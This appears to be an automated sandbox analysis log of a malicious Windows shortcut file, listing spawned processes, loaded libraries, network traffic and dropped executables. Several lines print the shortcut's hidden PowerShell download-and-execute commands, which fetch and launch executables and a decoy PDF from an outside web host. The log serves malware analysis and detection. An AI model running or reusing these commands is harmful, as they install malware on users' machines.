Source: powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000A.00000003.1444813166.00000203F2989000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000000A.00000003.1444813166.00000203F2920000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: powershell.exe, 00000012.00000002.2570641775.000001DA802A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1397020503.00000207CD332000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D780C32000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1360669295.000002F19007D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360669295.000002F1901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1337224669.000002F1819C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1397020503.00000207CE0D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1527872976.00000207DC8B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D7901B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1435615932.000001D781963000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1620609126.000001D790071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA901B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2710415892.000001DA90074000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1337224669.000002F181465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.1337224669.000002F181465000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown HTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 101.99.75.174:443 -> 192.168.2.11:49794 version: TLS 1.2

System Summary

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\nthelper.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\ctfmoon.exe
Source: IFhqcKaIol.lnk LNK file: -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden"
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: classification engine Classification label: mal80.winLNK@29/56@2/3
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7608:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2856:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zy5a0zic.jvn.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: IFhqcKaIol.lnk ReversingLabs: Detection: 21%
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\nthelper.exe "C:\Users\user\AppData\Local\Temp\nthelper.exe"
Source: C:\Users\user\AppData\Local\Temp\nthelper.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\alert.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2080 --field-trial-handle=1640,i,16748263348592557741,8757425967150341878,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\nthelper.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\nthelper.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: IFhqcKaIol.lnk, LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Data Obfuscation

Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Start-Process powershell -ArgumentList 'Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/drp.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe"); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) "nthelper.exe")' -WindowStyle Hidden"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -Uri https://badlarrysguitars.com/share/drp.exe -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe); Start-Process -FilePath (Join-Path ([System.IO.Path]::GetTempPath()) nthelper.exe)
Source: C:\Users\user\AppData\Local\Temp\nthelper.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/share/alert.pdf" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "alert.pdf")
Source: C:\Users\user\AppData\Local\Temp\nthelper.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -c Invoke-WebRequest -Uri "https://badlarrysguitars.com/private/nois.exe" -OutFile (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe"); Start-Process (Join-Path ([System.IO.Path]::GetTempPath()) "ctfmoon.exe")
Source: initial sample, Static PE information: section where entry point is pointing to: T10B924G
Source: nthelper.exe.3.dr, Static PE information: real checksum: 0x19cbc should be: 0x1e859
Source: nthelper.exe.3.dr, Static PE information: section name: T10B924G
Source: nthelper.exe.3.dr, Static PE information: section name: G8MCUXOZ
Source: nthelper.exe.3.dr, Static PE information: section name: Z2TXZQUP
Source: nthelper.exe.3.dr, Static PE information: section name: SRW4MTG9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 0_2_00007FFE7DE000BD pushad ; iretd 0_2_00007FFE7DE000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 0_2_00007FFE7DE03AD8 push E85B3357h; ret 0_2_00007FFE7DE03AF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_00007FFE7DDD00BD pushad ; iretd 3_2_00007FFE7DDD00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_00007FFE7DDD0AFD pushad ; retf 3_2_00007FFE7DDD0B02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 6_2_00007FFE7DDE00BD pushad ; iretd 6_2_00007FFE7DDE00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 18_2_00007FFE7DDE19CF pushad ; retf 18_2_00007FFE7DDE1A31
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 18_2_00007FFE7DDE00BD pushad ; iretd 18_2_00007FFE7DDE00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Code function: 18_2_00007FFE7DDE1AA7 pushad ; iretd 18_2_00007FFE7DDE1AB1

Persistence and Installation Behavior

Source: LNK file, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\nthelper.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\ctfmoon.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
